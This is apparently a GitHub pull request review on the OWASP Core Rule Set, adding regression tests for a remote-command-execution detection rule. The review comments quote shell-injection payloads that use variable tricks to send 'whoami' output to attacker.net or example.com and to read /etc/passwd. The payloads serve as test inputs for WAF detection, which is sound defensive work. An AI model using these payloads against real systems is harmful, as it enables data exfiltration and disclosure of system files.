tests: add coverage for BB EBIDJ91T and MKXQCJMX
coreruleset/coreruleset pull request #2950
Opened 2022-11-02 22:25 UTC by fzipi

Signed-off-by: Felipe Zipitria <felipe.zipitria@owasp.org>

- adds test to prove coverage

2022-11-10 06:05 UTC, theseion commented on tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml
> +              a%3Dcurl%26%26b%3Dwhoami%26%26%24a%20attacker.net%2F%24b
Is literal style necessary here?

2022-11-10 06:05 UTC, theseion commented on tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml
> +              a%3D%2Fetc%26%26b%3D%2Fpasswd%26%26c%3Dcat%26%26%24c%20%24a%24b
Is literal style necessary here?

2022-11-11 11:22 UTC, fzipi commented on tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml
> +              a%3Dcurl%26%26b%3Dwhoami%26%26%24a%20attacker.net%2F%24b
No. Removed.

2022-11-11 11:22 UTC, fzipi commented on tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml
> +              a%3D%2Fetc%26%26b%3D%2Fpasswd%26%26c%3Dcat%26%26%24c%20%24a%24b
Removed.

2022-11-12 21:22 UTC, dune73 requested changes

2022-11-12 21:22 UTC, dune73 commented on tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml
> +            data: a%3Dcurl%26%26b%3Dwhoami%26%26%24a%20attacker.net%2F%24b
The original payload is 
```
code=a=curl&&b=\`whoami\`&&\$a example.com/\$b
```

Your payload is
```
a=curl&&b=whoami&&$a attacker.net/$b
```

Apparently enough to trigger, but why the diff?

2022-11-12 21:22 UTC, dune73 commented on tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml
> +            data: a%3D%2Fetc%26%26b%3D%2Fpasswd%26%26c%3Dcat%26%26%24c%20%24a%24b
Again a diff to the curl_1.sh payload. Why?

2022-11-12 22:27 UTC, fzipi commented on tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml
> +            data: a%3Dcurl%26%26b%3Dwhoami%26%26%24a%20attacker.net%2F%24b
Don't know, maybe bad copy&paste? Changed to original payload.

2022-11-12 22:29 UTC, fzipi commented on tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml
> +            data: a%3D%2Fetc%26%26b%3D%2Fpasswd%26%26c%3Dcat%26%26%24c%20%24a%24b
No clue. Changed to original in report.

2022-11-20 22:45 UTC, dune73 commented
@fzipi I'm happy to give a positive review, but you still miss the backticks from the original payload.

2022-11-21 00:12 UTC, fzipi commented
Copy and pasted now.

2022-11-21 07:11 UTC, dune73 approved these changes
Thank you. Works out now.

2022-11-21 07:11 UTC, merged